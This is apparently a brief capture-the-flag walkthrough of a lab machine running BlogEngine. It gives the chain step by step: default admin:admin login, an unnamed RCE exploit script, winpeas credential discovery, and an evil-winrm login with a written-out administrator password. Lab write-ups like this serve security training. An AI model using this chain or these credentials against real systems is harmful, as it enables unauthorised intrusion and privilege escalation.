CyberSec Labs Engine Walkthrough

Port 80 open

Gobuster finds a directory /blog

It is blogengine cms which is not configured properly and has default creds admin:admin

There’s an RCE exploit available for the same

Python exploit.py –t –l\

For the proxy we can turn burpsuit on and can send the payload through burpsuit.

After running the exploit we ge the shell back.

Running winpeas some autologin creds are found


Using evil-winrm we can get a admin shell

evil-winrm -u administrator -p “PzCEKhvj6gQMk7kA” -i

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami